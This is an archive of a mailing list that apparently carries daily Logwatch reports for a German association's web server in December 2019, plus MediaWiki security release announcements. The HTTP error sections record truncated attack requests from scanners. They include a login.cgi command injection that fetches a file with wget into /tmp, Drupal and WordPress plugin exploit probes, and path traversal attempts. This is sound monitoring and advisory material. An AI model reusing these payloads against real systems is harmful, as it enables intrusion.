Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Tue Dec 24 04:42:04 2019
Date Range Processed: yesterday
( 2019-Dec-23 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [162:164]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
A total of 3 sites probed the server
172.104.242.173
172.105.4.63
61.219.11.153
Requests with error response codes
400 Bad Request
null: 8 Time(s)
mstshash=Administr: 7 Time(s)
mstshash=hello: 3 Time(s)
/: 2 Time(s)
/login.cgi?cli=aa%20aa%27;wget%20http://18 ... h%20/tmp/kh%27$: 1 Time(s)
/nmaplowercheck1577100860: 1 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 1 Time(s)
zapf.in: 1 Time(s)
403 Forbidden
/resolutionen/sose17/gesellschaftlich_verantwortung/: 1 Time(s)
404 Not Found
/robots.txt: 33 Time(s)
/berlin/apple-touch-icon.png: 18 Time(s)
/wp-login.php: 4 Time(s)
//user/register/?element_parents=account/m ... mat=drupal_ajax: 2 Time(s)
//webconfig.txt.php: 2 Time(s)
//wp-admin/admin-post.php?swp_debug=load_o ... 20%22h1loo1%22;: 2 Time(s)
//wp-admin/admin-post.php?swp_debug=load_o ... wpaa=phpinfo();: 2 Time(s)
////wp-login.php: 1 Time(s)
/985yo1oz19idwrts: 1 Time(s)
/berlin/,: 1 Time(s)
/download/reader_hb02.pdf: 1 Time(s)
/nndgo9b5n0l7fbxl: 1 Time(s)
/sites/all/libraries/elfinder-1.2/elfinder.php.html: 1 Time(s)
/sites/all/libraries/elfinder/__elfinder.php.html: 1 Time(s)
/sites/all/libraries/elfinder/_elfinder.php.html: 1 Time(s)
/sites/default/files/2009_WiSe_M%C3%BCnchen.pdf: 1 Time(s)
/sites/default/files/2014_SoSe_Duesseldorf.pdf: 1 Time(s)
/uefevysst4aoow3o: 1 Time(s)
405 Method Not Allowed
/?q=user%2Fpassword&name%5B%23post_render% ... s%2Fvuln.php%27: 1 Time(s)
500 Internal Server Error
/: 21 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
Invalid Users:
Unknown Account: 28 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
11.628K Bytes accepted 11,907
11.628K Bytes sent via SMTP 11,907
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
1 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
1 Total 4xx Rejects 100.00%
======== ==================================================
1788 Connections
1733 Connections lost (inbound)
1788 Disconnections
1 Removed from queue
1 Sent via SMTP
11 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Network Read Write Errors: 1
Disconnecting after too many authentication failures for user:
root : 172 Time(s)
Failed logins from:
Illegal users from:
undef: 26 times
**Unmatched Entries**
fatal: no matching cipher found: client aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc,none server aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com [preauth] : 6 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/vzfs 400G 241G 160G 61% /
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
5 years, 9 months
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Mon Dec 23 04:42:03 2019
Date Range Processed: yesterday
( 2019-Dec-22 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [149:148]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
A total of 3 sites probed the server
172.104.242.173
45.56.78.64
61.219.11.153
Requests with error response codes
400 Bad Request
mstshash=Administr: 5 Time(s)
null: 4 Time(s)
/: 1 Time(s)
/setup.cgi?next_file=netgear.cfg&todo=sysc ... ntsetting.htm=1: 1 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 1 Time(s)
404 Not Found
/robots.txt: 27 Time(s)
/berlin/apple-touch-icon.png: 10 Time(s)
/2019/wp-login.php: 1 Time(s)
/berichte/WiSe14/Bericht_WiSe14-Bremen.pdf: 1 Time(s)
/blog/wp-login.php: 1 Time(s)
/resolutionen/sose17/gesellschaftlich_vera ... wantwortung.pdf: 1 Time(s)
/sites/default/files/2009_WiSe_M%C3%BCnchen.pdf: 1 Time(s)
/sites/default/files/2014_SoSe_Duesseldorf.pdf: 1 Time(s)
/sites/default/files/Empfehlungen_der_ZaPF ... 7CStellungnahme: 1 Time(s)
/test/wp-login.php: 1 Time(s)
/verein%7C: 1 Time(s)
/wordpress/wp-login.php: 1 Time(s)
/wp/wp-login.php: 1 Time(s)
500 Internal Server Error
/: 4 Time(s)
//login_sid.lua: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
Invalid Users:
Unknown Account: 34 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
9 Miscellaneous warnings
13.519K Bytes accepted 13,843
13.519K Bytes sent via SMTP 13,843
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
382 Connections
330 Connections lost (inbound)
382 Disconnections
1 Removed from queue
1 Sent via SMTP
1 Timeouts (inbound)
6 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Disconnecting after too many authentication failures for user:
root : 170 Time(s)
Failed logins from:
Illegal users from:
undef: 18 times
**Unmatched Entries**
fatal: no matching cipher found: client aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc,none server aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com [preauth] : 9 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/vzfs 400G 241G 160G 61% /
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
5 years, 10 months
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Sun Dec 22 04:42:04 2019
Date Range Processed: yesterday
( 2019-Dec-21 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [165:165]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
171.12.10.191 -> zapf.wiki:443: 1 Time(s)
60.191.52.254 -> zapf.wiki:443: 1 Time(s)
A total of 2 sites probed the server
158.69.158.101
61.219.11.153
Requests with error response codes
400 Bad Request
/: 13 Time(s)
mstshash=Administr: 6 Time(s)
null: 3 Time(s)
zapf.wiki:443: 2 Time(s)
/.git/HEAD: 1 Time(s)
/favicon.ico: 1 Time(s)
/robots.txt: 1 Time(s)
404 Not Found
/robots.txt: 25 Time(s)
/verei: 12 Time(s)
/verein/kontak: 12 Time(s)
/berlin/apple-touch-icon.png: 10 Time(s)
/zapf/fachschafte: 8 Time(s)
/zapf/reade: 8 Time(s)
/zapf/resolutione: 8 Time(s)
/zapf/studienfuehre: 8 Time(s)
/home/zapf: 1 Time(s)
/resolutionen/wise17/Akkreditierung_PosPap/Pospap_: 1 Time(s)
/sites/all/libraries/elfinder/connectors/php/connector.php: 1 Time(s)
/sites/all/libraries/elfinder/elfinder.html: 1 Time(s)
/sites/all/libraries/elfinder/src/connecto ... p/connector.php: 1 Time(s)
/sites/all/libraries/plupload/examples/upload.php: 1 Time(s)
/wp-login.php: 1 Time(s)
500 Internal Server Error
/: 100 Time(s)
/robots.txt: 2 Time(s)
//login_sid.lua: 1 Time(s)
/ajax: 1 Time(s)
/favicon.ico: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
Invalid Users:
Unknown Account: 46 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
19 Miscellaneous warnings
15.999K Bytes accepted 16,383
15.999K Bytes sent via SMTP 16,383
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
2 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
2 Total 4xx Rejects 100.00%
======== ==================================================
80 Connections
28 Connections lost (inbound)
80 Disconnections
1 Removed from queue
1 Sent via SMTP
1 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Disconnecting after too many authentication failures for user:
root : 175 Time(s)
Failed logins from:
Illegal users from:
undef: 26 times
**Unmatched Entries**
Protocol major versions differ for 81.169.130.158: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-NmapNSE_1.0 : 1 time(s)
fatal: Unable to negotiate a key exchange method [preauth] : 1 time(s)
error: Received disconnect from 141.98.10.39: 2: Handshake failed [preauth] : 2 time(s)
Protocol major versions differ for 81.169.130.158: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-Nmap-SSH1-Hostkey : 1 time(s)
fatal: no matching cipher found: client aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc,none server aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com [preauth] : 8 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/vzfs 400G 241G 160G 61% /
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
5 years, 10 months
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Sat Dec 21 04:42:03 2019
Date Range Processed: yesterday
( 2019-Dec-20 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [156:157]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
A total of 1 sites probed the server
66.240.205.34
Requests with error response codes
400 Bad Request
/: 2 Time(s)
mstshash=Administr: 2 Time(s)
null: 2 Time(s)
/?0628182016134805143312: 1 Time(s)
icap://icap-server.net/server?arg=87: 1 Time(s)
404 Not Found
/robots.txt: 37 Time(s)
/berlin/apple-touch-icon.png: 18 Time(s)
/home/verein: 3 Time(s)
/home/zapf: 3 Time(s)
/wp-login.php: 3 Time(s)
/protokolle/Protokoll_MV_FFM_21.11.2015.pdf: 2 Time(s)
/__media__/js/netsoltrademark.php: 1 Time(s)
/resolutionen/wise15/Transparenz_in_der_Dr ... sparenz_in_der_: 1 Time(s)
/sites/default/file/2013_05_Stellungnahme_CHERanking.pdf: 1 Time(s)
/verein/satzung/%7CSatzung: 1 Time(s)
/xmlrpc.php: 1 Time(s)
500 Internal Server Error
/: 130 Time(s)
/HNAP1: 1 Time(s)
/ajax: 1 Time(s)
/app/provision/000000000000.cfg: 1 Time(s)
/app/provision/?mac=00a2895806ec: 1 Time(s)
/evox/about: 1 Time(s)
/login/submit/only: 1 Time(s)
/nmaplowercheck1576863746: 1 Time(s)
/sdk: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
Invalid Users:
Unknown Account: 54 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
6 Miscellaneous warnings
13.751K Bytes accepted 14,081
13.751K Bytes sent via SMTP 14,081
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
2 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
2 Total 4xx Rejects 100.00%
======== ==================================================
101 Connections
44 Connections lost (inbound)
101 Disconnections
1 Removed from queue
1 Sent via SMTP
2 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- rsyslogd Begin ------------------------
**** Unmatched entries ****
[origin software="rsyslogd" swVersion="8.4.2" x-pid="243" x-info="http://www.rsyslog.com"] exiting on signal 15. : 1 Times
---------------------- rsyslogd End -------------------------
--------------------- Connections (secure-log) Begin ------------------------
**Unmatched Entries**
systemd-logind: New seat seat0.: 1 Time(s)
---------------------- Connections (secure-log) End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
SSHD Started: 2 Time(s)
Disconnecting after too many authentication failures for user:
invalid : 1 Time(s)
root : 170 Time(s)
Failed logins from:
Illegal users from:
undef: 18 times
**Unmatched Entries**
error: Received disconnect from 141.98.10.39: 2: Handshake failed [preauth] : 1 time(s)
fatal: no matching cipher found: client aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc,none server aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com [preauth] : 4 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/vzfs 400G 241G 160G 61% /
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
5 years, 10 months
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Fri Dec 20 04:42:03 2019
Date Range Processed: yesterday
( 2019-Dec-19 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [155:156]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Requests with error response codes
400 Bad Request
../../: 2 Time(s)
mstshash=Administr: 2 Time(s)
../../proc/: 1 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 1 Time(s)
7: 1 Time(s)
G?\xC7)J\x08\xB5+^9\x16j: 1 Time(s)
403 Forbidden
/resolutionen/: 1 Time(s)
404 Not Found
/robots.txt: 58 Time(s)
/berlin/apple-touch-icon.png: 6 Time(s)
/home/verein: 1 Time(s)
/plus/search.php?q=www.ymwears.cn: 1 Time(s)
/reader/2017_SoSe_Berlin_vorlaeufig.pdf: 1 Time(s)
/resolutionen/wise12/Reso_WiSe12_Zivilgesellschaftliches: 1 Time(s)
/search/?query=www.ymwears.cn: 1 Time(s)
/search?q=www.ymwears.cn: 1 Time(s)
/sites/default/files/Empfehlungen_der_ZaPF ... 7CStellungnahme: 1 Time(s)
/wp-login.php: 1 Time(s)
500 Internal Server Error
/: 26 Time(s)
/.env: 1 Time(s)
/ajax: 1 Time(s)
/api/v1/pods: 1 Time(s)
/cart/: 1 Time(s)
/catalog/: 1 Time(s)
/shop/: 1 Time(s)
/store/: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
Invalid Users:
Unknown Account: 49 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
1 Miscellaneous warnings
13.491K Bytes accepted 13,815
13.491K Bytes sent via SMTP 13,815
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
294 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
294 Total 4xx Rejects 100.00%
======== ==================================================
420 Connections
305 Connections lost (inbound)
420 Disconnections
1 Removed from queue
1 Sent via SMTP
2 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Disconnecting after too many authentication failures for user:
root : 165 Time(s)
Failed logins from:
Illegal users from:
undef: 25 times
**Unmatched Entries**
error: Received disconnect from 141.98.10.39: 2: Handshake failed [preauth] : 1 time(s)
fatal: no matching cipher found: client aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc,none server aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com [preauth] : 6 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/vzfs 400G 241G 160G 61% /
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
5 years, 10 months
[MediaWiki-announce] MediaWiki Extensions and Skins Security Release Supplement
by Scott Bassett
Greetings-
With the security/maintenance release of MediaWiki 1.31.6/1.32.6/1.33.2
[0], we would also like to provide this supplementary announcement of
MediaWiki extensions and skins with now-public Phabricator tasks, security
patches and backports [1]:
== CheckUser ==
+ (T234862, CVE-2019-18611) - Do not show oversighted edit summaries in
CheckUser API
<https://gerrit.wikimedia.org/r/q/Ie0aa0df2b3f03d8b910733f1b5e600a0dc978765>
== AbuseFilter ==
+ (T104807, CVE-2019-18612) - Older hidden versions of a currently-public
AbuseFilter are exposed via diffs
<https://gerrit.wikimedia.org/r/q/Ie23e8234ae550273bf3f6f9c5ac45b7fc54eec2a>
+ (T237887, CVE-2019-18987) - Old public versions of private filters are
publicly viewable
<https://gerrit.wikimedia.org/r/q/Ic12790bd33982473f77551bde9599ed083a3e1f1>
== VisualEditor ==
+ (T239209, CVE-2019-19708) - XSS in Visual Editor via Copy&Paste
<https://gerrit.wikimedia.org/r/q/I1f99458fd2c4f6b2460dfe7a93b330ddee4400b6>
== MinervaNeue skin ==
+ (T240487, CVE requested) - XSS in MinervaNeue skin
<https://gerrit.wikimedia.org/r/q/Ida471291f1698387a26736931ab17e6899e05b51>
== LDAPAuthentication2 ==
+ (T240338, No CVE requested) - LDAPAuthentication2 allows login with
invalid password
<https://gerrit.wikimedia.org/r/q/I7b125ab468ebc914b8a1c67ed0c03e3c2a20c6cd>
The Wikimedia Security Team recommends updating these extensions and skins
to the current master branch or relevant, supported release branch [2] as
soon as possible. Some of the referenced Phabricator tasks above _may_
still be private. Unfortunately, when security issues are reported,
sometimes sensitive information is exposed and since Phabricator is
historical, we cannot make these tasks public without exposing this
sensitive information. If you have any additional questions or concerns
regarding this update, please feel free to contact security(a)wikimedia.org
or file a security task within Phabricator [3].
[0]
https://lists.wikimedia.org/pipermail/wikitech-l/2019-December/092886.html
[1] https://phabricator.wikimedia.org/T234983
[2] https://www.mediawiki.org/wiki/Version_lifecycle
[3] https://www.mediawiki.org/wiki/Reporting_security_bugs
--
Scott Bassett
sbassett(a)wikimedia.org
_______________________________________________
MediaWiki announcements mailing list
To unsubscribe, go to:
https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce
5 years, 10 months
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Thu Dec 19 04:42:03 2019
Date Range Processed: yesterday
( 2019-Dec-18 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [149:148]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
157.52.156.49 -> zapf.wiki:443: 2 Time(s)
222.186.19.221 -> zapf.wiki:443: 1 Time(s)
A total of 2 sites probed the server
62.210.77.54
66.240.192.138
Requests with error response codes
400 Bad Request
mstshash=Administr: 9 Time(s)
null: 7 Time(s)
/socket.io/?noteId=Dvll-V5GR7CGvuqIIyKt1g& ... BjySluNBKSBAAlm: 3 Time(s)
zapf.wiki:443: 3 Time(s)
/: 2 Time(s)
/manager/html: 2 Time(s)
../../: 1 Time(s)
/?0628182016134805143312: 1 Time(s)
/login.cgi?cli=aa%20aa%27;wget%20http://54 ... h%20/tmp/kh%27$: 1 Time(s)
/socket.io/?noteId=Dvll-V5GR7CGvuqIIyKt1g& ... fbW1Z8GlgmbAAwS: 1 Time(s)
403 Forbidden
/resolutionen/sose17/gesellschaftlich_verantwortung/: 1 Time(s)
404 Not Found
/robots.txt: 25 Time(s)
/berlin/apple-touch-icon.png: 6 Time(s)
/reader/2017_SoSe_Berlin_vorlaeufig.pdf%7C: 1 Time(s)
/resolutionen/sose17/gesellschaftlich_vera ... wantwortung.pdf: 1 Time(s)
500 Internal Server Error
/: 89 Time(s)
/HNAP1: 2 Time(s)
/evox/about: 2 Time(s)
/sdk: 2 Time(s)
/_VTI_BIN/WSTS: 1 Time(s)
/cgi-bin/config.exp: 1 Time(s)
/manager/html: 1 Time(s)
/nmaplowercheck1576675640: 1 Time(s)
/nmaplowercheck1576676504: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
Invalid Users:
Unknown Account: 34 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
5 Miscellaneous warnings
14.690K Bytes accepted 15,043
14.690K Bytes sent via SMTP 15,043
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
1 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
1 Total 4xx Rejects 100.00%
======== ==================================================
144 Connections
14 Connections lost (inbound)
144 Disconnections
1 Removed from queue
1 Sent via SMTP
5 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Network Read Write Errors: 1
Disconnecting after too many authentication failures for user:
root : 170 Time(s)
Failed logins from:
Illegal users from:
undef: 13 times
**Unmatched Entries**
error: Received disconnect from 141.98.10.39: 2: Handshake failed [preauth] : 1 time(s)
fatal: no matching cipher found: client aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc,none server aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com [preauth] : 2 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/vzfs 400G 241G 160G 61% /
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
5 years, 10 months
[MediaWiki-announce] Security pre-release announcement: 1.30.6 / 1.32.6 / 1.33.2 / 1.34.0
by Sam Reed
Hi all,
Tomorrow we will be issuing a security and maintenance release to all
supported branches of MediaWiki.
It will also coincide with the formal release of 1.34.0, which has
been a little bit delayed due to the US holidays and the Wikimedia
Technical Conference whilst the last few couple of outstanding issues could
be fixed. It also meant that a followup release to the REL1_34 branch
wouldn't be needed only a couple of weeks after the 1.34.0 release was cut.
The new releases will be:
1.34.0
1.33.2
1.32.6
1.31.6
This will resolve 1 issue in MediaWiki core (when running on older PHP
versions), and also includes some fixes previously committed to git, such
as minor security and hardening patches.
Fixes will be available in these respective release branches, and also
master. Tarballs will be available for the above mentioned point releases
as well.
1.32.6 will also be the final release for 1.32 (barring any unforeseen
issues), which is scheduled to become end of life in January 2020 [1]. If
you're using 1.32, it is recommended that you upgrade to the latest point
release of the 1.33 branch (1.33.2, to be released tomorrow) or 1.34.0 to
carry on using a maintained and supported release.
This security release includes fixes for MediaWiki core.
A summary of some of the security fixes that have gone into non-bundled
MediaWiki extensions will also follow.
[1] https://www.mediawiki.org/wiki/Version_lifecycle
Thanks!
Sam
_______________________________________________
MediaWiki announcements mailing list
To unsubscribe, go to:
https://lists.wikimedia.org/mailman/listinfo/mediawiki-announce
5 years, 10 months